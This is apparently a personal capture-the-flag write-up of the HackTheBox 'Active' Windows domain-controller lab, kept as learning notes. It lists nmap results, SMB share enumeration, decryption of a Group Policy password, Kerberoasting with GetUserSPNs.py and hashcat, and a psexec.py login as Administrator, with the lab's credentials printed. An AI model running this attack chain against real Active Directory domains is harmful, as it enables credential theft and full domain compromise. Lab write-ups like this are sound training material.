HTB Write-up Active (Windows) - Active Directory

What I learned today: 
​
​
​
Nmap Scan Result: 
​
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-02-11 03:58:43Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
​
Host script results:
| smb2-time: 
|   date: 2022-02-11T03:59:42
|_  start_date: 2022-02-11T03:56:29
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled and required
​
​
All port scans 
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
9389/tcp  open  adws
49152/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49158/tcp open  unknown
49169/tcp open  unknown
49173/tcp open  unknown
49174/tcp open  unknown
​
tried kerbrute: 
got [email protected] 
no luck on other usernames so far. 
​
SMB enum:
I got some shares.
Let's do more SMB enum. 
enum4linux is outdated and didn't give me much useful info. 
​
For SMB enum, use smbmap! 
smbmap -H 10.129.138.208 
shows what permission we have! 
\To find out the actual host name, do some nslookup: 
It shows that we have read access on Replication! TIP: smbclient -L lists but to connect just do smbclient IP/FILESHARE
now we have access to replication share! 
Find the host name 
Nslookup
1.set the server name as the target IP
2.ask who's 127.0.0.1
3.if it doesn't show ask who's TARGET_IP ( in this case, it times out)
​
dnsrecon to scan the entire subnet 
NEW: dnsrecon -d 10.129.138.208 -r 10.129.138.208/8 --depth 10 
didn't work well this time.
​
​
Search through the directories in the user share with: 
smbmap -H 10.129.138.208 -R Replication --depth 10
found a group policy file: groups.xml 
Download the file with 
smbmap -H 10.129.138.208 -R Replication -A Groups.xml -q --depth 10
-q quiet
-A downloads a file if it's available.
saves the file to 10.129.138.208-Replication_active.htb_Policies...
Grouppolicy password is encrypted. 
Decrypted it via 
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
​
Now that we have a password, let's do 
smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.129.138.208
​
Used GetUserSPNs to dump hashes.
 GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.129.138.208 -request
​
hashcat it 
​
pass for the administrator is Ticketmaster1968 
​
Now that we have the password, let's use the psexec.py to escalate priviledge 
psexec.py active.htb/Administrator:[email protected]
We are in the system! 
​
LLMNR Poisoning
Forest HTB (ippsec) -followthrough
Last modified 1yr ago